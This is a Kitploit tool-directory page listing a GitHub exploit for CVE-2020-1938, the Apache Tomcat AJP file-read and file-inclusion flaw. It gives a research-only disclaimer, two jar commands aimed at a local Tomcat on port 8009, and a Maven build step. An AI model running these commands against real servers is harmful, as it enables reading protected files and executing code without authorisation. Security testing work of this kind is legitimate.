Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-1938 — CVE-2020-1938 | Kitploit
Tools/GitHubGitHub/sgdream/cve-2020-1938
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubsgdream/cve-2020-1938

CVE-2020-1938

CVE-2020-1938

View Repository
3896 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-1938

The tool is only for security research and internal self-inspection. It is prohibited to use the tool to launch illegal attacks. The user is responsible for any consequences.

apache-tomcat-8.5.32.zip test tomcat

Arbitrary file read

root@kitploit:~
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 file /index.jsp

File inclusion

root@kitploit:~
java -jar 1.jar com.threedr3am.bug.tomcat.ajp.FileRead 127.0.0.1 8009 jsp /index.jsp

Packaging method: In the directory tomcat/ajp-bug Execute mvn clean compile assembly:assembly

Source: https://github.com/threedr3am/learnjavabug

Download Tool